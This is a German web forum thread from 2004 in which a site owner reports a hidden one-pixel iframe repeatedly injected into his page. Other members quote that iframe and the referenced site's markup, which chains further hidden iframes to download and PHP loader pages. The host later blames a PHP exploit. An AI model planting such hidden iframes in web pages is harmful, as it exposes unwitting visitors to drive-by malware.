Anzeige - [Hier werben / Mediadaten]
(?) Tags raten (?) (edit)
 
Reply to this topicStart new topicStart Poll
> Eigenartiger Code automatisch generiert...
recotha
Geschrieben am: Mi 21.04.2004, 07:59
Report PostQuote Post

AyomRank 4
********

Gruppe: Member (aktiv)
Beiträge: 87
Mitglied seit: 6.04.2004


hi zusammen
habe was eigenartiges entdeckt. auf meiner tunnel-seite hat sich direkt nach dem body-tag folgendes iframe eingeschlichen:

CODE
<IFRAME SRC="http://www.forced-action.com/?d=get" WIDTH="1" HEIGHT="1"></IFRAME>


hat jemand sowas schonmal gesehen?
bei gewissen usern hat dies angeblich einen JS-error hervorgerufen und der norton zeigte einen virus-alert an.
ich habe den code jedenfalls nie so eingebaut, und weiss auch nicht, woher dieser kommen kann? evtl. virus auf dem webserver?

ich kann das file hochladen und wieder hochladen, nach einer kurzen zeit ist das verfluchte iframe wieder drin... habe schonmal danach gegoogelt, und gesehen, dass ich nicht der einzige mit diesem problem bin. woran es liegt, konnte ich aber bisher nicht herausfinden!

gruss
recotha
Top
PMEmail Poster
Top
 
 
sd12
#2 Geschrieben am: Mi 21.04.2004, 09:20 (+01:21)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Moderatoren
Beiträge: 3581
Mitglied seit: 3.03.2004


Hallo

Wechsle deinen Hoster. Entweder hat er die Scheisse gemacht.. oder er ist nicht fähig einen sauberen, sicheren webserver aufzusetzen


--------------------
************************
Treiber f[r das Kezboard ist [berfl[ssig.
Top
PMEmail PosterICQMSN
Top
 
Florian
suchpad media
#3 Geschrieben am: Mi 21.04.2004, 19:24 (+10:04)
Report PostQuote Post

AyomRank 6
Group Icon

Gruppe: Moderatoren
Beiträge: 894
Mitglied seit: 6.12.2003


Die Adresse http://www.forced-action.com/ gibt es ja überhaupt nicht! Vielleicht wars ja auch ein Fehler von dir!

MFG
Florian


--------------------
Top
PMEmail PosterUsers Website
Top
 
sd12
#4 Geschrieben am: Mi 21.04.2004, 19:28 (+00:03)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Moderatoren
Beiträge: 3581
Mitglied seit: 3.03.2004


Doch die Seite gibts...

CODE
<html>
<head></head>
<body>
<iframe src="http://c.coolshader.com/download/download.php?id=2&aid=1103" width=1 height=1>
<iframe src="tool.html" width=1 height=1>
<iframe src="http://hard-virgins.com/dl/fox.php" width=1 height=1></iframe>
<iframe src="lala.html" width=1 height=1></iframe>
</body>
</html>


--------------------
************************
Treiber f[r das Kezboard ist [berfl[ssig.
Top
PMEmail PosterICQMSN
Top
 
Florian
suchpad media
#5 Geschrieben am: Mi 21.04.2004, 20:06 (+00:37)
Report PostQuote Post

AyomRank 6
Group Icon

Gruppe: Moderatoren
Beiträge: 894
Mitglied seit: 6.12.2003


Die Adresse ist zwar registriert aber es erscheint kein Inhalt!

MFG
Florian


--------------------
Top
PMEmail PosterUsers Website
Top
 
recotha
#6 Geschrieben am: Mi 21.04.2004, 20:28 (+00:21)
Report PostQuote Post

AyomRank 4
********

Gruppe: Member (aktiv)
Beiträge: 87
Mitglied seit: 6.04.2004


QUOTE (Florian @ Mi 21.4.2004, 19:24)
Vielleicht wars ja auch ein Fehler von dir!

ja und vielleicht wars auch der böse wolf! - machst du witze? zeig mir einen der AUS VERSEHEN ein iframe mit einer solch ominösen page einbindet. aber danke trotzdem, war sicher nett gemeint =)
den src-code von beni hab ich auch gesehen (quelltext anzeigen)...
hab mal beim provider ein ticket aufgegeben, aber noch nichts gehört.
ich kann im homesite den ganzen stuss rausnehmen, 15 minuten später ist die schei**e wieder drin!
Top
PMEmail Poster
Top
 
recotha
#7 Geschrieben am: Mi 21.04.2004, 20:46 (+00:17)
Report PostQuote Post

AyomRank 4
********

Gruppe: Member (aktiv)
Beiträge: 87
Mitglied seit: 6.04.2004


des rätsels lösung (antwort vom support):

Die Seite wurde unter Zuhilfenahme eines PHP-Explods von ausserhalb (die getracte IP führt nach Russland ?!) verändert.
Da Ihre Domain in den nächsten Tagen/Wochen sowieso im Rahmen von Unify 2004 nach Zürich migriert werden wird, würden wir vorschlagen dies gleich zu tun. Sie haben da eine andere PHP Version und ein chrooted-Serversystem welches um einiges sicherer ist als das Alte. Weiter verfügen die neuen Server über Spamfilter und Virenscanner.

Bitte bestätigen Sie uns die Migration der Domain für morgen (22/4/04). Sie erhalten danach umgehend die neuen Zugangsdaten um eventuell zusätzlich vorhandene Mailaccounts wieder einrichten zu können (es wird aber schon ein CatchAll installiert sein um alle Mails "einzufangen" damit nichts verloren geht).
Wir werden sämtliche Inhalte migrieren, dabei diese iFrames scannen und entfernen und auch alle eventuell vorhandenen Datenbanken auf den neuen Server transferieren.
Top
PMEmail Poster
Top
 
Thema wird von 0 Benutzer(n) gelesen (0 Gäste und 0 anonyme Benutzer)
0 Mitglieder:
Trackback-Url: http://www.ayom.com/track/t/1202

Topic Options Reply to this topicStart new topicStart Poll

 


> Ähnliche Themen
automatisch immer das richtige Wetter steini 97 1 Fr 10.10.2008, 10:12
Bild automatisch aktualisieren LindaXtra 290 5 So 5.10.2008, 13:09
B:Keywords automatisch verlinken Sancheck 301 2 Fr 19.09.2008, 14:56
Brauche Code um Werbung auf Website einzubinden Norbert Hofmann 323 2 Mo 25.08.2008, 20:58
Wie kann ich Bilder automatisch beschriften? vorta 6198 16 Mo 11.08.2008, 09:11
Browser springt automatisch auf verkleinern sarah007 129 2 Mo 9.06.2008, 10:56
Probleme mit neuem Google Analytics-Code bestätigt Peter Schneider 1050 12 Mo 2.06.2008, 07:58
Adsense Channel automatisch Daniel Cieslar 204 1 Mo 28.04.2008, 18:25
PHP-Code schützen radarin 262 8 So 13.01.2008, 22:23
Code ändern, aber ...? japsa 407 6 Mi 7.11.2007, 13:05




Anzeige - [Hier werben / Mediadaten]



Anzeigen


[Hier werben / Mediadaten]